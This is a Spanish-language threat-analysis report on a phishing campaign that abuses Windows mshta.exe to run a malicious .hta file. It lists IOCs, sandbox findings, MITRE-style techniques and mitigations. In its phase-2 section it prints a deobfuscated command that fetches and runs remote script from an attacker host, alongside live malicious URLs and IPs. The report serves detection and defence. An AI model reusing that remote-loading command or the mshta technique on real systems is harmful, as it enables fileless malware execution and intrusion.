Introducción

En el mundo de la ciberseguridad, los atacantes evolucionan constantemente, desarrollando nuevas técnicas para evadir la detección y comprometer sistemas.
Entre estas técnicas se encuentra el abuso de mshta.exe, un binario legítimo de Windows capaz de ejecutar archivos con extensión .hta.
Este mecanismo ha sido utilizado principalmente en campañas de phishing, donde los atacantes envían archivos .hta adjuntos o enlaces a contenido remoto que, al ejecutarse, permiten la ejecución de código malicioso en el equipo destino.

El presente informe documenta esta técnica de abuso, describiendo los métodos de infección, IOCs y artefactos observados, así como las medidas de mitigación recomendadas.

¿Qué es mshta y por qué se abusa?

mshta es una herramienta de Windows que ejecuta archivos con extensión .hta, los cuales usualmente contienen HTML + JavaScript / VBScript.
Por esta razón, puede emplearse para realizar acciones como:

• Descarga o ejecución de payloads (parte del malware que realiza acciones maliciosas)

•  Invocaciones de PowerShell o WScript.

•  Ejecución de comandos del sistema.

•  Bypass (Metodo para saltar los controles de seguridad) de controles de seguridad.

•  Dropper (Programa que instala archivos maliicosos) o comunicaciones C2.

Al ser un componente legítimo de Microsoft dificulta su detección, los atacantes lo utilizan como LOLBin (Living off the land binary, herramienta del sistema legitima utilizada con propósitos maliciosos), ejecutando código remoto mediante URL lo cual deja pocos residuales en el disco (campañas fileless execution).

Medios de infección:

Mshta.exe aun siendo legítimo, representa un vector de riesgo por su capacidad de ejecutar código y descargar payloads.
Los atacantes lo emplean en campañas de phishing (Correos maliciosos enviados con intención de engañar al usuario para ejecutar acciones no autorizadas), mediante:

• Archivos adjuntos con extensión .hta.

• Accesos directos con extensión .lnk que invocan mshta.

• Scripts (instrucciones automatizadas que ejecutan tareas dentro del sistema) locales o documentos de Office con macros (Programas que automatizan tareas dentro de aplicaciones).

Factores que favorecen su explotación:

• Políticas permisivas de correo.

• Macros habilitadas por defecto.

• Falta de control de ejecución (Mecanismos que regulan qué programas pueden ejecutarse).

• Ausencia de correlación de eventos o monitoreo de tráfico.

Diagrama de funcionamiento típico:

Detección inicial:

La detección de mshta.exe puede variar según el entorno. En este caso, se visualiza la siguiente linea de comandos:

"C:\Windows\SysWOW64\mshta.exe" "E:\Usuarios\XXXX\AppData\Local\Temp\8ac82909-fa11-4131-81db-16860182f38e_АгсАԁјυпто__𝟾𝟾𝟷.zip.38e\АгсАԁјυпто__𝟿𝟾º.HTa" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

mshta.exe fue utilizado para ejecutar el archivo АгсАԁјυпто__𝟿𝟾º.HTA, con parámetros:

• {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

El archivo fue ejecutado desde la carpeta Temp, un comportamiento común en modelos maliciosos.

Se identificaron múltiples conexiones de red originadas desde la línea de comandos inicial, lo que permitió determinar el primer IOC:

• 184.168.20.233

Explotación, análisis y funcionamiento

Fase 1 – Obtención del archivo

Se obtuvo una muestra del correo origen en donde se visualiza una URL oculta, la cual simulaba un dominio de correo legítimo.
Al intentar acceder desde un sandbox (entorno aislado para manejo de archivos sospechosos de forma segura), el sitio detectó que la conexión provenía de fuera de México, restringiendo el acceso, lo que indica técnicas de geolocalización para campañas dirigidas.

Redirección:

• Is[.]gd/wLFuC2?USUARIO[.]USUARIO@COMPANYNAME[.]com

• Hxxp[:]//sctpatagoniateg[.]com/

Pruebas desde el sandbox:

Extracción y análisis del archivo АгсАԁјυпто__𝟿𝟾º.HTA

El archivo .hta fue obtenido mediante un sandbox local.
Este contaba con caracteres no válidos en su nombre, por lo que se renombró como Muestra.hta, para su análisis.

Errores al obtener el contenido: 

Se intentó visualizar su contenido mediante el comando Get-Content de PowerShell, obteniendo error de lectura. Al renombrarlo, se logró acceder al código interno y su sha-256 (Identificador único que valida la integridad del archivo).

• En el primero se observa la descarga de archivo TtsHh.js desde https[:]//128.191.109.208[.]host[.]secureserver[.]net/cgi/CSCDlUO/TtsHh.js?meteor_js_resource=true

• En el segundo se cuentan con cabeceras simuladas en formato JSON para evadir detección.

• El tercero es un mensaje que se muestra en pantalla simulando ser legítimo de hotmart, pero al leerlo no cuenta con sentido.

IOCs observados durante esta ejecución

• https[:]//128.191.109.208[.]host[.]secureserver[.]net/cgi/CSCDlUO/TtsHh.js?meteor_js_resource=true

• https[:]//club-ui-static-files[.]cb[.]hotmart[.]com/meteor/604ed2842c197920578701b6fa2f55458cd2

• 128[.]191.109.208[.]host[.]secureserver[.]net

• https[:]//128.191.109.208[.]host[.]secureserver[.]net/cgi/cscdluo/ttshh.js?meteor_js_resource=true

• https[:]//128.191.109.208[.]host[.]secureserver[.]net/cid

Fase 2 – Ejecución del archivo TtsHh.js

En el archivo descargado TtsHh.js se identificó el siguiente fragmento de código ofuscado (Proceso de modificar un programa para que sea más difícil de analizar, pero sin cambiar su funcionamiento):

Al desofuscarse, el comando real ejecutado corresponde a:

GetObject("script:https://128.191.109.208.host.secureserver.net/cid")

Este script es usado para cargar y ejecutar código remoto mediante mshta.exe, lo que permite su ejecución sin escritura en disco (fileless execution).

No fue posible recuperar el contenido alojado en la ruta remota /cid, ya que el servidor cerró la conexión durante el análisis.

Sin embargo, durante la ejecución controlada del archivo .HTA, se observaron las siguientes técnicas:

• Un script inició actividad de red.

• Detección de guard pages (páginas de memoria protegidas).

• Verificación de movimiento del ratón, técnica de detección de sandbox.

• Intento de establecer conexión de red mediante el proceso dllhost.exe.

• Consulta de la memoria disponible del sistema.

• Enumeración (recopilación de información sobre el sistema) del nombre de host del equipo.

• Consulta de la distribución del teclado y de la configuración regional.

• Acceso a un archivo dentro de la carpeta Public, para las rutas:

  • • o   file:C:\Users\Public\Desktop

    • o   file:C:\Users\Public\Desktop\desktop.ini

    • o   file:C:\Users\Public\MIKE-PC@2mike

    • o   file:C:\Users\Public\desktop.ini

• Lectura de claves del registro para determinar el idioma del sistema.

• Verificación de respuesta HTTP, para validar conexión con el punto C2.

• Acceso a las cookies (archivos que guardan información de sesión y preferencias) del navegador.

MITRE ATT&CK Technique Detection

Diagrama de funcionamiento especifico

Contexto y relevancia en incidentes recientes 

De acuerdo con datos oficiales de Kaspersky, durante 2024 el ejecutable mshta.exe estuvo presente en el 0.22% de los incidentes analizados y en el 1.43% de los incidentes catalogados como de alta severidad. Por su parte, Red Canary reporta que mshta.exe se posicionó como la novena técnica más utilizada en 2025, con impacto en el 4.9% de sus clientes. Finalmente, CISA documenta que este binario estuvo involucrado en aproximadamente el 13% de los casos relacionados con técnicas de evasión de defensas

.

Mitigación

Restringir mshta.exe únicamente por procesos que no se tengan identificados como válidos mediante reglas dentro de las herramientas de seguridad.

Ajustar las políticas de correo para los archivos adjuntos con extensiones .hta.

Realizar el bloqueo de los IOCs detectados.

Conclusiones

El abuso de mshta.exe para ejecutar archivos con extensión .hta recibidos por campañas phishing es una técnica frecuente y efectiva, porque utiliza un binario firmado por Microsoft para ejecutar scripts capaces de descargar o ejecutar payloads adicionales.

En este caso, se logró detectar la actividad inicial, sin embargo, es necesario complementar con políticas preventivas en correo electrónico y controles de ejecución para reducir el riesgo de reincidencia.